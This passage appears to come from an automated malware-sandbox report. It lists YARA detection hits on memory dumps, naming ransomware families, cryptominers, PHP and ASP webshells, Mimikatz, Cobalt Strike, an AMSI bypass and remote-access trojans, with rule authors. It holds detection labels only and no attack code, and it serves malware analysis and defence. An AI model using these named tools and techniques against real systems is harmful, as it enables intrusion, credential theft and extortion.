00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Joe Security Rule: MirageStrings, Description: Mirage Identifying Strings, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Seth Hardy Rule: Trojan_Win32_PlaKeylog_B, Description: Keylogger component, Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, Author: Microsoft Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6310770552.00000197A4B3C000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_MSIL_SharPersist_2, Description: unknown, Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, Author: FireEye Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Growtopia, Description: Yara detected Growtopia, Source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_Cobra_Locker, Description: Yara detected Cobra Locker ransomware, Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: Ammyy_Admin_AA_v3, Description: Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nemty, Description: Yara detected Nemty Ransomware, Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, Author: Joe Security Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6333426467.00000197A331E000.00000004.00000001.sdmp, Author: Joe Security Rule: hacktool_macos_keylogger_logkext, Description: LogKext is an open source keylogger for Mac OS X, a product of FSB software., Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, Author: @mimeframe Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar, Description: Yara detected Vidar stealer, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ByteLocker, Description: Yara detected ByteLocker Ransomware, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Artemon, Description: Yara detected Artemon Ransomware, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_lazparking, Description: Yara detected LazParking Ransomware, Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_EvilGnomeRC5Key, Description: Yara detected Linux EvilGnome RC5 key, Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, Author: unknown Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6299736334.00000197A2ED4000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6277539520.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6270634530.00000197A4698000.00000004.00000001.sdmp, Author: Joe Security Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Clop, Description: Yara detected Clop Ransomware, Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cute, Description: Yara detected Cute Ransomware, Source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Oilrig_IntelSecurityManager, Description: Detects OilRig malware, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Eyal Sela Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Winexe_tool, Description: Yara detected Winexe tool, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6328572357.00000197A4180000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, Author: Joe Security Rule: CVE_2018_4878_0day_ITW, Description: unknown, Source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, Author: unknown Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_generic, Description: php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_generic_eval, Description: Generic PHP webshell which uses any eval/exec function in the same line with user input, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: ChinaChopper_Generic, Description: China Chopper Webshells - PHP and ASPX, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_mock, Description: Yara detected Mock Ransomware, Source: 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000024.00000003.6278908021.00000197A4866000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000024.00000003.6287839327.00000197A4D21000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, Author: Joe Security Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_Samples, Description: Hacktool, Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, Author: unknown Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: 